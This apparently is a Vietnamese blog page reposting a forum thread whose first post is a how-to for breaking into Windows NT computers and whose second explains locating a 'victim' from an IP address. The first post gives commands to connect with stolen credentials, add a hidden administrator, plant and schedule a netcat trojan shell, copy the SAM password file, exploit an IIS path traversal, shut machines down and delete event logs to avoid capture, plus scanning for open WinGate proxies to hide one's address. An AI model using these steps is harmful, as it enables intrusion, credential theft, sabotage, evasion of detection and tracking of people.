»-(¯`v´¯)-» thanhhai»-(¯`v´¯)-»'s Blog

Thông tin cá nhân

thanhhai7621
Họ tên: ĐỖ THANH HẢI
Nghề nghiệp: sinh vien
Sinh nhật: 8 Tháng 6 - 1990
Nơi ở: TP HUẾ
Yahoo: camanh8284  
Trạng thái: User is offline (Vắng mặt)
Thêm vào nhóm bạn bè
Gửi tin nhắn
† đời sẽ về đâu...†

Bạn bè
HANG MO
HANG MO
hong_ngoc123
hong_ngoc123
gemini3691
gemini3691
hoa co tu
hoa co tu
MAI MAI MOT TINH YEU
MAI MAI MOT TINH YEU
lolibibica
lolibibica
le ngoc nguyen
le ngoc nguyen
hongtusonca_tt89
hongtusonca_tt89
socola_nt
socola_nt
ninhhienthu_90
ninhhienthu_90
Xem tất cả



Tik Tik Tak

Truyện cười

 

 

Trả lời
 
Ðiều Chỉnh <script type=text/javascript> vbmenu_register("threadtools"); Xếp Bài <script type=text/javascript> vbmenu_register("displaymodes");

  #1   Ban this user!
Old 14-06-2007, 10:56 AM
Girlsmehon's Avatar
Girlsmehon is offline <script type=text/javascript> vbmenu_register("postmenu_155631", true);
 
 
Tham gia ngày: Jun 2007
Location: Ho Chi Minh
Bài gởi: 116
Thanks: 8
Thanked 30 Times in 23 Posts
Send a message via Yahoo to Girlsmehon
Default Các Lệnh Cơ Bản Để Xâm Nhập Máy Tính

Phần 1: NET Chỉ cần có user và pass của một IP nào đó trên net là bạn có thể xâm nhập vào máy tính đó được rồi đấy. Tôi lấy ví dụ nếu các bác có được user là: quangtrung và pass là : 123456 của một địa chỉ IP là: 127.0.0.1 Chúng ta bắt đầu nào:
Hãy mở trình Ms dos và gõ vào lệnh sau :


net use \\127.0.0.1\ipc$ "123456" /user:"quangtrung" để kết nối một IPC$ với máy victtim
nhưng thao tác tiếp theo... bạn nhất thiết phải login xong mới có thể sử dụng bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới ... chúng ta cộng thệm một user mới là heibai và password lovechina
net user heibai lovechina / addNếu bạn thành công. Thì có thể cộng user này vào nhóm Adminstrator
Net Localgroup Adminstrator heibai / addTrong phần này tớ hướng dẫn tạo một ổ đỉa ảo trên computer
net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )Z là của mình...còn C$ là của Victim
Phần 2 : AT
Thường thường thì khi độp nhập vào máy tính... chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui. Vậy khi copy trojan lên máy rồi làm thế nào dể khới động nó đây ? chúng ta phải dùng đến lệnh AT thử xem nhé.
Đầu tiên, chúng ta cần biết thời gian của đối phương
net time \\127.0.0.1Bây giờ thì nó sẽ phản hồi thời gian của victim. Vd : 12:0
Tiếp theo, chúng ta cần tạo một homework ID = 1
AT \\127.0.0.1 12:3 nc*****Ở đây giả thiết là tui có con trojan la Nc***** và đã được copy lên máy victim rồi * giới thiệu chút it về NC. NC là từ viết tắc của NETCAT, nó là một telnet server với port 99 đợi đến 12:3 là nó sế tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99. Thế là xong phần lưu bút.
phần 3 : Telnet
Đây là một lệnh rất cần thiết khi xâm nhập máy tính. Nó có thể kết nối với máy tính khắc từ xa nhưng thường thi phải có ID & PW. Nhưng nếu máy đã ăn đạn rồi thì bạn chỉ cần connected đến port 99 là ok
telnet 127.0.0.1 99Thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh.
Phần 4 : Copy
Bây giờ chúng ta nói tiêp làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại. Nhưng bạn phải có kết nối IPC$ cái đã. Chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
copy index.html \\127.0.0.1\C$\index.htmlVếu bạn copy lên folder WINNT
copy index.html \\127.0.0.1\admin$\index.htmlMuốn copy files trên máy victm thì bạn gõ vào :
copy \\127.0.0.1\Admin$\repair\sam._c:\Phần 5 : Set
Bạn muốn hack một website ư? tất nhiến là phải mở port 80 nếu không thì hack cho ai xem ? đã tới lúc dùng lệnh Set rồi đó. Sau đây là kết quả mà tớ tìm thấy, chúng ta phân tích nghe chủ yếu là muốn biêt homepage nó ở đâu thui.
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd*****
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;*****;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGEᅩ CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd*****
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNTĐây là cách rất ngu nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì và ở dâu? khi cậu Dir chắc chắn là sẽ View được rất nhiều files đấy.
Phần 6 : Nbtstat
Nếu cậu Scan đuợc một máy sữ dụng Winnt open port 135-139 thế thì bồ phải dùng lệnh này để biết thêm user thôi
* tiện thể xin nói luôn đây là netbios. Sau khi có user rồi bạn có thể đoán mò password, nếu không thi Cracking luôn đi.
nbtstat - A XXX.XXX.XXX.XXXSau đây là kết quả tớ scan được
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUPKết quả cho biết User là PENTIUMIII
Phần 7 : Shutdown
Nhìn lệnh thôi cũng đủ biết rồi phải không ? đây là lệnh shutdown server Winnt
Shutdown \\127.0.0.1 t:2020 giây sau Winnt sẽ tự khời động lại hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này. Nó sế làm tổn thất rất nặng cho victim ,hãy làm tay hacker có đạo đức.
Phần 8 : Dir
Lệnh này không có gì để nói hết, chỉ dùng để view thôi.
Phần 9 : Del
Lệnh này giống như xoá nhật ký vậy đó. Khi chúng ta xâm nhập máy tình trên hệ thống sẽ lưu lại thông tin của chúng ta, vì thế nên del nó đi chứ muốn bị tóm cổ hả ? sau đây là những files nhật ký của Winnt :
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.logChỉ cần del hết là coi như xong. Ngoài ra những lệnh trong ms dos còn rất nhiều như lệnh ECHO, FTP, ATTRIB,... mà ở đây tui khÿng thể kể ra hết được.
1.> Wingate là gì?, và nó liên quan gì tới server acttack? WinGate là một chương trình đơn giản cho phép bạn chia các kết nối ra. Thí dụ: bạn có thể chia sẻ 1 modem với 2 máy. WinGate dùng với nhiều proxy khách nhau có thể che giấu bạn.
2.> Mặc định sau khi cài đặt. Khi bạn cài WinGate bình thường, không thay đổi thông số gì thì sẽ có một số mặc định :
Quote
Port | Service
23 Telnet Proxy Server - This is default and running right after install.
1080 SOCKS Server - This once setup via GateKeeper has no password until you set one.
6667 IRC Mapping - This once setup via GateKeeper has no password until you set one.
3.> Port 23: Telnet Proxy. Proxy sế chạy ngay sau khi bạn hoàn thành cài đặt và làm mọi thứ trở nên tồi tệ nếu không có mật mã sau khi cài đặt và không đòi hỏi bạn là người duy nhất. Nhiều quản trị hệ thống không biết việc này và cũng khÿng nghĩ sế đặt mật mã cho nó và đây là nơi xuất hiện trục trặc. Telnet proxy cũng thật sự đơn giản. Bạn telnet trên cổng 23 trên máy chủ chạy WinGate telnet proxy và bạn sế có dấu nhắc WinGate> Tại dấu nhắc này bạn đánh vào server, một khoảng trống và cổng bạn muốn kết nối vào. Thí dụ:
Quote
telnet wingate.net
Connected to wingate.net
WinGate> victim.com 23Thí dụ này cho thấy một ai đang dùng telnet vào WinGate server và sau đó từ WinGate server đó telnet tới victim.com vì vậy trên log của victim.com sế hiện ra IP của wingate (wingate.net) và vì vậy có thể giữ IP của mình bí mật.
4.> Port 1080: SOCKS Proxy. Socks proxy không được cài đặt mặc định nhưng ngay sau khi dùng GateKeeper sế cài đặt nó. Việc cài đặt này khÿng cần password, trừ khi bạn có đặt. Nếu bạn quen với socks bạn có thể biết nhiều việc có thể làm với nó.
5.> Port 6667: IRC Proxy. IRC proxy cũng giống như khi chúng ta dùng wingate telnet proxy bounce tới irc server trừ khi irc proxy đã được thiết lập để đến một server. Nó khÿng được thiết lập để chạy sau khi cài đặt nhưng sau khi bạn cài sế khÿng cần password, trừ khi bạn có đặt.
6.> Làm thế nào để tìm và sử dụng WinGate? Tìm WinGates cũng rất dễ làm. Nếu bạn muốn tìm IP WinGates tĩnh (IP khÿng đổi) thì đến yahoo hay một trang tìm kiếm cable modem. Tìm kiếm cable modems vì nhiều người dùng cable modems có WinGate để họ có thể chia sẻ đường truyền rộng của nó cable modems cho những máy khác trong nhà. Một cÿng ty cable modem lớn là Cox Cable. Trang web của họ có thể tìm thấy ở www.home.com. The Cox Cable có IP trong khoảng 24.1.X.X.
Bạn có thể dùng Port hay Domain scanners và scan Port 1080, tên gọi là SOCKS Proxy, đây cũng là một cách đơn giản để tìm WinGate. Thí dụ:
24.1.67.1 chỉ đến c224084-a.frmt1.sfba.home.com mà tại đó chúng ta biết sfba = San Fransico Bay Area hay cái gì gần như vậy.
Đó là cách tìm IP WinGates tĩnh. Để tìm IP động (IP thay đổi mỗi lần user kết nối vào internet) của WinGates cũng khÿng khó chút nàol. Hầu hết tất cả ISP lớn và nhỏ đều có user dùng WinGate. Bạn cần phải biết định dạng của ISP's dynamic ppp addresses hoặc bạn có thể dùng IRC (Internet Relay Chat). Giả sử bạn có ppp IP của armory-us832.javanet.com. Bây giờ bạn dns IP đó và có 209.94.151.143. Bây giờ lấy IP đó và đưa nó vào domain scanner program.
Thí dụ: Domscan có thể tìm thấy tại Rhino9 web site (rhino9.abyss.com). Ok, bây giờ bạn đã có domscan. Chạy domscan và có một box để đặt IP và port để scan. WinGate telnet proxy theo mặc định chạy trên cổng 23. Vì vật đặt 209.94.151.143 vào trong box đầu tiên trong domscan và 23 trong box thứ 2, sau đó click vào start. Ta có được kết quả:
209.94.151.2
209.94.151.4
209.94.151.6
209.94.151.10
209.94.151.8
209.94.151.73
209.94.151.118
209.94.151.132Bây giờ kiểm tra từng cái để tìm WinGate prompt. Để làm vật ta intelnet tới 209.94.151.2 trên cổng 23 và nếu nó hiện WinGate> khi chúng ta kết nối thì nó là WinGate. Nếu khÿng chúng ta làm tiếp địa chỉ kế tiếp có thể là 209.94.151.4. Chúng ta làm như vậy cho đến hết danh sách IP. Ghi chú: Nếu chúng ta scan dynamic IP WinGates nếu số cuối cùng của IP càng lớn thì hy vọng nó là IP của WinGate càng lớn. Thí dụ: Cơ hội 209.94.151.132 là WinGate lớn hơn 209.94.151.2.
__________________

Trả Lời Với Trích Dẫn
<script type=text/javascript>
 
  #2   Ban this user!
Old 20-06-2007, 11:20 PM
Black_Trinity's Avatar
 Black_Trinity is offline <script type=text/javascript> vbmenu_register("postmenu_157261", true);
 
Default 

Một trong những bước được cho là quan trọng nhất trước khi hack vào một hệ thống là lấy được địa chỉ IP của hệ thống đó. Tuy nhiên, đôi khi chúng ta lấy địa chỉ IP chỉ vì muốn biết thêm thông tin về một người hay máy chủ nào đó. Nhưng làm cách nào để biết được vị trí địa lý hay các thông tin khác về hệ thống đó mà chỉ thông qua địa chỉ IP có được? Bài hướng dẫn này của tôi sẽ tập trung trả lời câu hỏi trên.
Trên thực tế, cách xây dựng cấu trúc địa chỉ IP (đúng hơn là toàn bộ giao thức TCP/IP) không cho phép người ta chỉ nhìn vào IP mà biết được vị trí địa lý của hệ thống đang có địa chỉ IP đó. Trong địa chỉ IP không có phần nào cho bạn biết ngay máy tính đang được gán địa chỉ đó nằm ở nước nào. Vì thế, tất cả các câu nói kiểu như “phần thứ hai hay thứ ba của một địa chỉ IP thay thế cho nước mà hệ thống đang được gán IP đó hoạt động” chỉ là chuyện hoang đường.

Tuy nhiên, đúng là đôi khi, một người, chỉ cần nhìn vào 3 nhóm chữ số (octet) đầu tiên của một địa chỉ IP, có thể đoán hay suy diễn ra được hệ thống đang dùng địa chỉ IP đó nằm tại nước nào, thậm chí tại thành phố nào. Các bạn hãy xem minh hoạ sau thì sẽ hiểu ý tôi. Tuy nhiên, trước khi xem xét ví dụ, chúng ta thử tìm hiểu xem chính xác địa chỉ IP được gán cho người sử dụng như thế nào.

Đầu tiên, ISP (Internet Service Provider: nhà cung cấp dịch vụ Internet) của bạn đăng ký với cơ quan quản lý địa chỉ Internet và xin được cấp một dãy địa chỉ IP nhất định, mà sau đó các khách hàng (những người quay số kết nối vào server của ISP) sẽ được gán một trong những địa chỉ IP thuộc dãy này. Phần lớn các ISP được gán nhóm địa chỉ mạng lớp C. Một địa chỉ mạng lớp C bao gồm tiền tố mạng 24-bit (ba octet đầu tiên của một địa chỉ IP) và một số mạng 8-bit (octet cuối cùng). Nó thường được biết đến là “24’s” và được phần lớn các ISP sử dụng.

Giống như trong đời thường, một người có một địa chỉ nhà và có số điện thoại mà người khác có thể liên lạc với anh ta qua địa chỉ và số điện thoại đó, một máy tính khi nối mạng được gán một địa chỉ IP duy nhất được sử dụng để liên lạc với máy tính đó. Nếu diễn tả theo hệ thập phân thì địa chỉ IP gồm 32 bit được chia thành 4 octet, dĩ nhiên, mỗi octet 8 bit.
Liệu địa chỉ IP đó có cho ta biết thông tin gì không? Hay những con số đó có nói lên điều gì không?

Hãy thử xem địa chỉ IP của một máy tính: 202.144.49.110. Phần trước dấu chấm đầu tiên (tức là số 202) gọi là “số Mạng” hay còn gọi là “tiền tố MẠNG” (network prefix, trong một vài tài liệu tham khảo khác: network id – người dịch) Đây chính là số mạng mà máy chủ kết nối vào. Phần thứ hai (144) là chỉ số của máy chủ trong mạng nói trên. Điều đó có nghĩa là các máy tính trong cùng một mạng có phần “số mạng” (network number hay network id) trong địa chỉ IP giống nhau. Người ta phân ra các lớp địa chỉ IP để có thể phân bố mạng linh hoạt hơn tuỳ theo độ lớn của mạng.

Lớp A ( /8 Prefixes) 1.xxx.xxx.xxx đến 126.xxx.xxx.xxx
Lớp B ( /16 Prefixes) 128.0.xxx.xxx đến 191.255.xxx.xxx
Lớp C ( /24 Prefixes) 192.0.0.xxx đến 223.255.255.xxx

Các lớp khác nhau nói trên đươc giải thích rõ bởi các nội dung tóm tắt dưới đây:
Mỗi địa chỉ IP trong lớp A bao gồm 1 tiền tố mạng 8 bit (network prefix) và 1 số máy chủ 24 bit (host number). Lớp địa chỉ này là lớp nguyên khai, các địa chỉ IP này cũng được viết là “/8” hay chỉ đơn giản là “8” vì chúng có tiền tố mạng 8 bit.
Địa chỉ IP trong lớp B có tiền tố mạng 16 bit và số máy chủ 16 bit. Nó còn được gọi là “16”.
Một địa chỉ IP trong lớp C bao gồm tiền tố mạng 24 bit và 1 số máy chủ 8 bit. Chúng còn được gọi là “24” và được cấp cho nhiều ISP nhất.

Số người sử dụng Internet ngày càng tăng làm cho cơ quan quản lý địa chỉ Internet gặp nhiều khó khăn hơn trong việc định tuyến các địa chỉ IP. Bảng phân phối các địa chỉ IP mở rộng khiến các nhà chức trách buộc phải xin một địa chỉ mạng Internet mới trước khi triển khai một hệ thống mạng trong địa phương mình. Đây chính là lúc Sub-netting ra đời.
Nếu như nhà cung cấp dịch vụ Internet của bạn là một là cung cấp lớn và cấp cho bạn một địa chỉ IP động một lần bạn kết nối Internet, rất có thể bạn sẽ nhận thấy trong các lần bạn kết nối Internet, địa chỉ IP mà bạn được cấp sẽ có 24 bit đầu là giống nhau, và 8 bit cuối sẽ thay đổi. Điều này có thể giải thích bằng sự có mặt của sub-netting, vì khi đó, cấu trúc địa chỉ IP sẽ có dạng:
xxx.xxx.zzz.yyy
trong đó, 2 phần đầu là các số tiền tố mạng, zzz là số mạng con (phụ)(subnet) và yyy là số của máy tính đang kết nối. Thế có nghĩa là bạn luôn kết nối tới một subnet trong một mạng máy tính. Vì thế, ba phần đầu trong địa chỉ IP của bạn sẽ luôn giữ nguyên mỗi lần bạn kết nối Internet thông qua nhà cung cấp dịch vụ của bạn, chỉ có phần cuối cùng là thay đổi
Ví dụ, một ISP xyz nào đó được cấp một dãy địa chỉ mạng là: 203.98.12.xx thì mỗi khi bạn kết nối Internet qua ISP này và được cấp một địa chỉ IP, ba phần đầu của IP của bạn sẽ là 203.98.12. Rõ ràng chưa?

Như vậy, về cơ bản, mỗi ISP được cấp một dãy các địa chỉ riêng biệt mà sau đó nó sẽ gán cho các khách hàng sử dụng dịch vụ Internet của mình. Tất cả các thuê bao hay những người kết nối internet qua cùng một nhà cung cấp dịch vụ sẽ nằm cùng trong dãy địa chỉ IP mà ISP đó được cấp. Điều này cũng có nghĩa tất cả những thuê bao của một ISP có thể sẽ được cấp những IP mà có 3 phần đầu tiên giống nhau khi kết nối Internet.

Điều này cũng có nghĩa là nếu bạn tìm hiểu và thống kê thật nhiều (ý tôi nhiều theo đúng nghĩa thật nhiều) bạn có thể biết được một người đang sử dụng dịch vụ Internet của ISP nào mà chỉ cần nhìn vào IP của người đó. Tên của ISP sau đó có thể xác định người này đang ở thành phố và quốc gia nào. Đúng không? Để tôi lấy một ví dụ cho các bạn thấy rằng tuy rằng việc này hơi lằng nhằng nhưng nó dễ dàng như thế nào (tất nhiên là sau khi bạn đã tìm và thống kê đủ nhiều các ISP)
Ví dụ, tại nước tôi, có 3 nhà cung cấp dịch vụ Internet và lần lượt được cung cấp các dãy địa chỉ như sau:

ISP I 203.94.47.xx
ISP II 202.92.12.xx
ISP III 203.91.35.xx

Bây giờ, ví dụ tôi biết được địa chỉ IP của một người bạn trên mạng của tôi là: 203.91.35.12, thì tôi có thể đoán ngay rằng anh bạn tôi đang sử dụng dịch vụ của ISP III để kết nối Internet. Đúng không? Bạn có thể nói rằng một Ông ngốc cũng có thể nói được như thế. Ừ thì cũng đúng, nhưng bạn phải biết rằng với cách này, bạn phải thu thập được đầy đủ tên các ISP và bảng phân phối địa chỉ IP trong tay. Thế, điều tôi muốn nói ở đây là phương pháp trên chỉ thành công sau khi đã nghiên cứu và thống kê rất nhiều. Và theo ý tôi, những thống kê như vậy cũng sẽ hữu ích trong các việc khác nữa.
Hơn nữa, cách này không phải lúc nào cũng áp dụng thành công nếu như xét trên một quy mô lớn hơn. Nhỡ địa chỉ IP mà bạn có được lại là của một người sống trong căn lều tuyết tận cực Bắc thì sao? Bạn có thể sẽ chả có được tất cả địa chỉ mạng được phân phối của mọi ISP trên thế giới này đâu.

Lưu ý là trong trường hợp trên, bạn cũng có thể biết hệ thống có IP này ở thành phố nào, vì phần lớn các ISP sử dụng các địa chỉ IP khác nhau ở các thành phố khác nhau. Cũng như thế, một số ISP chỉ hoạt động tại một thành phố mà thôi.

Vậy thì có cách nào hay hơn để biết được vị trí địa lý của một IP không? Có chứ, chìa khóa chính là việc tra cứu DNS ngược.
Cũng giống như DNS look up tra cứu và chuyển một tên miền thành địa chỉ IP, một lệnh tra cứu DNS ngược chuyển địa chỉ IP của một máy tính thành một tên miền. Tên miền, ý tôi là địa chỉ của một hệ thống được thể hiện bằng chữ abc, cùng với số và dấu phân cách, ví dụ mail2.bol.net.in là một tên miền, và 203.45.67.98 không được coi là một tên miền.
Công cụ thông dụng và tuyệt vời “nslookup” của Unix có thể được dùng để tra ngược lại DNS.
Nếu bạn dùng *nix hoặc có một shell account, việc đầu tiên là bạn tìm xem công cụ nslookup được giấu ở đâu với lệnh
‘whereis nslookup’
Một khi bạn đã biết được công cụ này ở chỗ nào, bạn có thể dùng nó để tra DNS hoặc tra ngược các DNS. Vì đây không phải là bài hướng dẫn sử dụng lệnh “nslookup” nên tôi sẽ chỉ đưa ra những chỉ dẫn tối thiểu có liên quan mà thôi. Nếu muốn biết thêm chi tiết về hoạt động và cách sử dụng, bạn hãy đọc những tài liệu hướng dẫn chuyên về *nix.
Chúng ta có thể sử dụng ‘nslookup’ để tra ngược một DNS bằng cách gõ vào địa chỉ IP của máy sau dấu nhắc lệnh

Cấu trúc:
$ > nslookup IP Address

Ví dụ, thay vì gõ vào từ ``IP Address``, chúng ta gõ vào 203.94.12.01 (IP mà ta muốn theo dõi)
$ > nslookup 203.94.12.01

Sau đó, có thể bạn sẽ nhận được câu trả lời có dạng như: mail2.bol.net.in
Địa chỉ IP và máy tính trong bài được đưa ra với mục đích minh họa, chúng có thể không tồn tại.
Bây giờ, nếu bạn nhìn kỹ vào mạng máy tính mà việc tra ngược DNS cho kết quả, bạn sẽ thấy phần cuối sẽ cho ta biết thông tin mạng máy tính đó đặt ở nước nào. Thấy không, phần “.in” cho ta biết, mạng này nằm ở Ấn Độ (India). Tất cả các quốc gia đều có một mã quốc gia, mã này phần lớn sẽ xuất hiện trong phần cuối của một máy tính hay một hệ thống trong đặt trong quốc gia đó. Cách này cũng có thể cho bạn biết một người ở nước nào nếu biết được địa chỉ email của người đó. Ví dụ, nếu một người có địa chỉ email kết thúc với .ph thì có thể người này sống ở Philippin và nếu địa chỉ email có đuôi là .il thì rất có thể anh ta sống ở Israel, tương tự như thế. Một số mã quốc gia thường thấy là:
Country Code
Australia .au
Indonesia .id
India .in
Japan .jp
Israel .il
Britain .uk
Muốn biết thêm chi tiết về mã quốc gia, bạn thử ghé qua:
http://www.alldomains.com/
http://www.iana.org/domain-names.html

Người dùng Windows có thể thực hiện lệnh tra ngược DNS qua Samspade tại www.samspade.org
Một cách khác để biết được chính xác vị trí địa lý của một địa chỉ IP là tận dụng cơ sở dữ liệu của WHOIS. Cơ sở dữ liệu WHOIS về cơ bản là một CSDL chính bao gồm tên và địa chỉ liên lạc của người sở hữu một tên miền. Vì vậy, về cơ bản, bạn chỉ cần thực hiện một lệnh whois, cung cấp cho nó một hostname mà bạn muốn biết thêm thông tin. Dịch vụ whois này sẽ cho bạn những thông tin mà nó có trong CSDL.
Với cách này, bạn có thể có được thông tin tương đối chính xác về một địa chỉ IP hay một máy tính nào đó, tuy nhiên, cũng có thể nó chả có ích gì nếu bạn muốn tìm được địa điểm chính xác của một địa chỉ IP động. Nhưng, cần phải nhắc lại là ít nhất bạn cũng sẽ biết được ISP mà nạn nhân đang kết nối Internet với nằm ở thành phố nào.

Bạn có thể dùng WHOIS trên http://allwhois.com/
Bạn cũng có thể gõ trực tiếp dòng lệnh vào thanh địa chỉ của browser

Ví dụ:
http://205.177.25.9/cgi-bin/whois?abc.com

Chú ý, bạn phải thay abc.com bằng tên miền mà bạn muốn sử dụng lệnh whois để tra. Dùng cách này, bạn không thể biết được địa chỉ liên lạc của 1 người nếu địa chỉ IP mà bạn dùng để truy tìm dấu vết anh ta lại phụ thuôc vào ISP của anh ta. Vì thế, bạn phải biết được tên miền (được chính người này đăng kýdưới tên anh ta) không thì bạn chỉ biết được tên thành phố (hoặc ISP) mà người đó đã đăng ký theo chúng .

Ví dụ như nạn nhân đã đăng ký một tên miền và bạn muốn qua tên miền này tìm xem anh ta đang ở đâu. Nhưng phải lưu ý một điểm là nếu nạn nhân này dùng một trong hàng loạt những dịch vụ đăng ký tên miền miễn phí như kiểu Namezero.com, thì tên miền này có thể đăng ký trên danh nghĩa công ty chứ không phải chính nạn nhân. Vì thế, kết quả sau khi whois sẽ là tên của ISP đó chứ không phải là tên của nạn nhân.

*****
Gửi tới các newbie, dịch vụ WHOIS mặc định chạy qua cổng 43. Thử dùng lệnh này bằng cách telnet tới cổng 43 và gõ lệnh này vào. Tôi chưa thử bao giờ, nhưng chắc là sẽ hứa hẹn cái gì đó thú vị đấy.
*****

Một cách khác để tìm vị trí địa lý của một địa chỉ IP và có thể nói hữu hiệu chỉ thua cách trên (Reverse DNS queries) mà thôi là áp dụng tiện ích ‘theo dõi dấu vết’ (traceroute)
Tiện ích “tracert” hay “traceroute” sẽ cho bạn biết tên hay IP của những máy tính trung chuyển trong suốt quãng đường gói tin đi qua trước khi đến được điểm cuối. Những người dùng Windows có thể thực hiện việc theo dõi một IP bằng cách chạy câu lệnh này trong command prompt:
C:\windows > tracert IP or Hostname

(Bạn hãy gõ lệnh ‘tracert’ trong command prompt để biết rõ hơn về cách sử dùng và cú pháp của lệnh này)

Dù sao, chúng ta cùng xem kết quả trả về như thế nào khi tôi thử lệnh này với chính địa chỉ IP của tôi. Tôi đang ở New Delhi, một thành phố tại Ấn Độ. Bạn hãy để ý kỹ tên các máy chủ, bạn sẽ thấy nó tiết lộ các thành phố mà gói tin này được chuyển qua.

C:\windows > tracert 203.94.12.54
Tracing route to 203.94.12.54 over a maximum of 30 hops
1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

Như thế, các dòng trên cho ta thấy chặng đường mà gói tin đi qua trước khi đến được địa chỉ IP cung cấp trước:
Netzero (ISP nơi cung cấp địa chỉ IP) --- > Spectranet (A Backbone Provider) ----- > New York ISP --- > New York Backbone - > Asia -- > South Asia - > India Backbone -- > New Delhi Backbone -- > Another router in New Delhi Backbone --- > New Delhi ISP.

Đôi khi, ‘lần dấu vết’ của một IP không đem lại những thông tin có giá trị lắm. Trong ví dụ trên, bạn thấy được thông tin về thành phố và quốc gia của máy chủ. Măc dù có lúc bạn nhận được thông tin hữu ich về tên máy chủ như nói ở trên, nhưng đôi khi tên máy chủ trả về khi bạn ‘tracert’ rất mờ mịt và khó định vị. Vậy thì làm sao đây? Hi`, sợ rằng chả có cách nào khác, thử cách này vậy. Ví dụ thông tin trả về sau khi tracert là một tên miền abc.com. Chắc chắn nó quá mông lung và không thể biết được hệ thống này ở đâu cả. Tuy nhiên, bạn có thể gõ tên miền này vào thanh địa chỉ của browser. Nếu http://www.abc.com/ là địa chỉ của một ISP vì rất có thể trang web sẽ cho bạn biết vị trí và thành phố mà ISP hoạt động. Vì thế, bạn vẫn có cơ hội lần ra được vị trí của nạn nhân.

Một tiện ích rất thú vị là Visualroute, nó tìm dấu vết của một máy chủ hoăc 1 đia chỉ IP và chỉ ra các chặng đường mà môt gói tin đã từng đi qua trên bản đồ TG, để đến 1 đia chỉ cuối cùng. Tiện ích này rất hữu dụng và mang đến các thông tin tuyệt vời. Nhưng đôi khi lại có vẻ không chính xác.

Ví dụ như bạn biết được ISP một người đang sử dụng, và đơn giản muốn được biết người ta đang ở nước nào. Vào trang web của ISP đó cũng không có kết qủa và cũng không tìm đươc tên máy chủ. Vậy thì làm thế nào? Hãy thử kết nối vào cổng 13 của ISP đó. Cổng này cũng chỉ đơn giản cho bạn biết giờ hệ thống mà thôi. Nhưng nó cho bạn biết nó sớm hơn hay muộn hơn bao nhiêu tiếng so với giờ GMT!
Đến đây cũng là lúc tôi kết thúc bài hướng dẫn này. Trước khi kết thúc, tôi muốn nhấn mạnh một lần nữa là thật ra rất rất khó và cũng thật ngạc nhiên nếu một ai đó có thể biết được địa chỉ liên lạc chính xác của một người trên mạng khi chỉ biết được mỗi địa chỉ IP của người đó (mà không đột nhập vào hệ thống ISP của người đó) Dù sao cũng mong các bạn cảm thấy bài hướng dẫn này có gì đó thú vị.

 

> Trả lời nhanh
Nhập vào tên của bạn:
Nhập mã số xác nhận (bắt buộc):
» Hiển thị cửa sổ mặt cười       » Download bộ gõ tiếng Việt Unikey
 Bạn có muốn chuyển các ký hiệu như :) :( :D ...thành mặt cười trong bài viết này?
 Bạn có muốn chèn thêm chữ ký vào bài viết này ?
 


 
CHBTNSB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
